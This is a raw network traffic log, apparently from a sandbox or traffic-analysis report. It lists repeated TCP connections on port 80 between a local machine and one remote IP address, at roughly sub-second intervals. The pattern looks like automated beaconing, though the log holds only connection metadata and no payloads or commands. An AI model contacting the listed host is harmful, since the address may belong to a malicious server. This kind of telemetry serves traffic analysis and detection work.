                  Jul 2, 2024 00:27:31.002126932 CEST4989580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:31.006720066 CEST804989477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:31.006771088 CEST4989480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:31.007368088 CEST804989577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:31.007426023 CEST4989580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:31.007890940 CEST4989580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:31.012628078 CEST804989577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:31.714417934 CEST804989577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:31.714996099 CEST4989580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.005290985 CEST4989580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.005676031 CEST4989680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.010464907 CEST804989577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:32.010492086 CEST804989677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:32.010596037 CEST4989680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.010596037 CEST4989580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.024245024 CEST4989680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.029031992 CEST804989677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:32.722124100 CEST804989677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:32.722184896 CEST4989680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.726485014 CEST4989680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.726878881 CEST4989780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.731714010 CEST804989777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:32.731796980 CEST4989780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.731887102 CEST804989677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:32.731933117 CEST4989680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.732110023 CEST4989780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:32.739100933 CEST804989777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:33.434792042 CEST804989777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:33.434890032 CEST4989780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:33.540714979 CEST4989780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:33.541116953 CEST4989880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:33.548219919 CEST804989877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:33.548301935 CEST4989880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:33.548429966 CEST4989880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:33.548711061 CEST804989777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:33.548819065 CEST4989780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:33.555748940 CEST804989877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:34.239109993 CEST804989877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:34.239310980 CEST4989880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:34.242280960 CEST4989880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:34.242731094 CEST4989980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:34.247409105 CEST804989877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:34.247500896 CEST804989977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:34.247524977 CEST4989880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:34.247658968 CEST4989980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:34.247900009 CEST4989980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:34.252655029 CEST804989977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:34.948859930 CEST804989977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:34.948916912 CEST4989980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.056126118 CEST4989980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.056572914 CEST4990080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.061357975 CEST804990077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:35.061434984 CEST4990080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.061434984 CEST804989977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:35.061484098 CEST4989980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.061634064 CEST4990080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.066734076 CEST804990077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:35.882183075 CEST804990077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:35.882317066 CEST4990080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.885777950 CEST4990080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.886085033 CEST4990180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.890870094 CEST804990177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:35.890919924 CEST804990077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:35.894860029 CEST4990180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.894860983 CEST4990080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.895025969 CEST4990180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:35.899769068 CEST804990177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:36.595822096 CEST804990177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:36.597163916 CEST4990180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:36.713185072 CEST4990180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:36.713483095 CEST4990280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:36.718250036 CEST804990277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:36.718319893 CEST4990280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:36.718344927 CEST804990177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:36.718444109 CEST4990180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:36.718775988 CEST4990280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:36.723532915 CEST804990277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:37.422610998 CEST804990277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:37.425004959 CEST4990280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:37.678636074 CEST4990280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:37.684741974 CEST804990277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:37.685179949 CEST4990280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:37.687468052 CEST4990380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:37.692487001 CEST804990377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:37.692895889 CEST4990380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:37.697964907 CEST4990380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:37.702855110 CEST804990377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:38.388003111 CEST804990377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:38.388098955 CEST4990380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:38.493858099 CEST4990380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:38.494189024 CEST4990480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:38.498980999 CEST804990477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:38.499008894 CEST804990377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:38.499097109 CEST4990380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:38.499119997 CEST4990480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:38.499298096 CEST4990480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:38.504158974 CEST804990477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:39.208529949 CEST804990477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:39.209142923 CEST4990480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:39.211816072 CEST4990580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:39.211822987 CEST4990480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:39.216603994 CEST804990577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:39.216721058 CEST4990580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:39.216837883 CEST804990477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:39.216943979 CEST4990580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:39.217077971 CEST4990480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:39.221656084 CEST804990577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:39.938034058 CEST804990577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:39.938097954 CEST4990580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:40.057894945 CEST4990580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:40.058218002 CEST4990680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:40.064548016 CEST804990677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:40.064615011 CEST4990680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:40.064775944 CEST4990680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:40.064881086 CEST804990577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:40.064934015 CEST4990580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:40.071192980 CEST804990677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:40.781914949 CEST804990677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:40.788928032 CEST4990680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.098797083 CEST4990680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.099411964 CEST4990780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.103925943 CEST804990677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:41.104218960 CEST804990777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:41.104253054 CEST4990680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.106726885 CEST4990780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.112859964 CEST4990780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.117645979 CEST804990777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:41.808721066 CEST804990777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:41.808789968 CEST4990780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.915884018 CEST4990780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.916285992 CEST4990880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.921127081 CEST804990777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:41.921139956 CEST804990877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:41.921180964 CEST4990780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.921226978 CEST4990880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.921627045 CEST4990880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:41.926348925 CEST804990877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:42.627805948 CEST804990877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:42.627857924 CEST4990880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:42.631243944 CEST4990880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:42.631668091 CEST4990980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:42.636678934 CEST804990977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:42.636749029 CEST4990980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:42.637049913 CEST4990980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:42.637052059 CEST804990877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:42.637099028 CEST4990880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:42.641992092 CEST804990977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:43.334249020 CEST804990977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:43.334391117 CEST4990980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:43.446554899 CEST4990980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:43.446554899 CEST4991080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:43.453229904 CEST804991077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:43.453428030 CEST4991080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:43.453561068 CEST804990977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:43.453609943 CEST4991080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:43.453671932 CEST4990980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:43.460222006 CEST804991077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:44.274358034 CEST804991077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:44.274415970 CEST4991080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:44.278004885 CEST4991080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:44.278326988 CEST4991180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:44.284567118 CEST804991077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:44.284625053 CEST4991080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:44.285128117 CEST804991177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:44.285195112 CEST4991180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:44.285496950 CEST4991180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:44.292298079 CEST804991177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.024765968 CEST804991177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.024925947 CEST4991180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.134459972 CEST4991180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.134459972 CEST4991280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.141697884 CEST804991277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.141781092 CEST4991280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.141993046 CEST804991177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.144892931 CEST4991280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.144927025 CEST4991180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.151408911 CEST804991277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.874988079 CEST804991277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.875055075 CEST4991280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.879528046 CEST4991280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.879925013 CEST4991380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.884666920 CEST804991277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.884720087 CEST4991280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.885220051 CEST804991377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:45.885293007 CEST4991380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.885494947 CEST4991380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:45.890791893 CEST804991377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:46.583563089 CEST804991377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:46.583626032 CEST4991380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:46.696599960 CEST4991380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:46.696599960 CEST4991480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:46.703885078 CEST804991477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:46.704135895 CEST804991377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:46.706913948 CEST4991380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:46.706913948 CEST4991480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:46.707103014 CEST4991480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:46.714409113 CEST804991477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:47.423033953 CEST804991477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:47.423157930 CEST4991480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:47.426286936 CEST4991480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:47.426291943 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:47.431071997 CEST804991577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:47.431159019 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:47.431543112 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:47.431560040 CEST804991477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:47.431653976 CEST4991480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:47.436250925 CEST804991577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:48.867541075 CEST804991577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:48.867805958 CEST804991577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:48.868057966 CEST804991577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:48.868158102 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.868158102 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.977860928 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.977864981 CEST4991680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.985449076 CEST804991677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:48.986953974 CEST4991680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.987001896 CEST804991577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:48.990848064 CEST4991680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.990991116 CEST4991580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:48.998172998 CEST804991677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:49.715853930 CEST804991677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:49.715955973 CEST4991680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:49.732486010 CEST4991680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:49.732884884 CEST4991780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:49.737925053 CEST804991777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:49.737989902 CEST4991780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:49.738075972 CEST804991677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:49.738122940 CEST4991680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:49.738322020 CEST4991780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:49.744158983 CEST804991777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:50.457822084 CEST804991777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:50.457895041 CEST4991780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:50.572354078 CEST4991780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:50.572681904 CEST4991880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:50.577476978 CEST804991777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:50.577532053 CEST4991780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:50.577759027 CEST804991877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:50.577816963 CEST4991880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:50.578016043 CEST4991880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:50.582818985 CEST804991877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:51.274373055 CEST804991877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:51.274485111 CEST4991880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:51.278522015 CEST4991880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:51.278527021 CEST4991980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:51.285039902 CEST804991977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:51.285485983 CEST804991877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:51.285564899 CEST4991880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:51.285567045 CEST4991980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:51.286154032 CEST4991980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:51.292944908 CEST804991977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:51.987782955 CEST804991977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:51.987849951 CEST4991980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.103749037 CEST4991980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.104130030 CEST4992080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.110543966 CEST804992077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:52.110559940 CEST804991977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:52.110616922 CEST4992080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.110625029 CEST4991980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.110888958 CEST4992080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.117482901 CEST804992077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:52.827332020 CEST804992077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:52.827457905 CEST4992080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.830389023 CEST4992080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.830389023 CEST4992180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.837161064 CEST804992177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:52.837236881 CEST4992180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.837719917 CEST4992180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.838177919 CEST804992077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:52.838238001 CEST4992080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:52.844974995 CEST804992177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:53.564385891 CEST804992177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:53.564507961 CEST4992180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:53.681844950 CEST4992180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:53.682295084 CEST4992280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:53.689974070 CEST804992177.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:53.690007925 CEST804992277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:53.690023899 CEST4992180192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:53.690068007 CEST4992280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:53.690315962 CEST4992280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:53.697319031 CEST804992277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:54.398050070 CEST804992277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:54.398108959 CEST4992280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:54.401263952 CEST4992280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:54.401671886 CEST4992380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:54.408401966 CEST804992277.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:54.408457994 CEST4992280192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:54.408601046 CEST804992377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:54.408664942 CEST4992380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:54.408920050 CEST4992380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:54.414344072 CEST804992377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.101187944 CEST804992377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.101440907 CEST4992380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.218333006 CEST4992380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.219038963 CEST4992480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.225421906 CEST804992477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.225608110 CEST4992480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.225617886 CEST804992377.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.225755930 CEST4992380192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.226856947 CEST4992480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.233483076 CEST804992477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.962435007 CEST804992477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.962501049 CEST4992480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.966101885 CEST4992480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.966654062 CEST4992580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.973069906 CEST804992477.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.973093033 CEST804992577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:55.973109961 CEST4992480192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.973159075 CEST4992580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.973500967 CEST4992580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:55.979876041 CEST804992577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:56.691535950 CEST804992577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:56.694977045 CEST4992580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:56.805696011 CEST4992580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:56.806866884 CEST4992680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:56.812607050 CEST804992577.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:56.813339949 CEST804992677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:56.814986944 CEST4992580192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:56.814986944 CEST4992680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:56.815186977 CEST4992680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:56.823632002 CEST804992677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:57.509808064 CEST804992677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:57.510963917 CEST4992680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:57.514305115 CEST4992680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:57.514631033 CEST4992780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:57.519464016 CEST804992777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:57.519793034 CEST804992677.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:57.519890070 CEST4992680192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:57.519915104 CEST4992780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:57.520201921 CEST4992780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:57.524935007 CEST804992777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:58.211472988 CEST804992777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:58.211530924 CEST4992780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:58.322434902 CEST4992780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:58.322783947 CEST4992880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:58.327544928 CEST804992877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:58.327641964 CEST4992880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:58.327749014 CEST804992777.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:58.327819109 CEST4992780192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:58.328193903 CEST4992880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:58.333034039 CEST804992877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.051047087 CEST804992877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.054990053 CEST4992880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.058017969 CEST4992980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.058022022 CEST4992880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.064562082 CEST804992977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.064723015 CEST804992877.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.064846039 CEST4992980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.064857006 CEST4992880192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.065084934 CEST4992980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.071743011 CEST804992977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.805485010 CEST804992977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.805542946 CEST4992980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.915894985 CEST4992980192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.916271925 CEST4993080192.168.2.477.91.77.81
                  Jul 2, 2024 00:27:59.921094894 CEST804993077.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.921142101 CEST804992977.91.77.81192.168.2.4
                  Jul 2, 2024 00:27:59.921160936 CEST4993080192.168.2.477.91.77.81
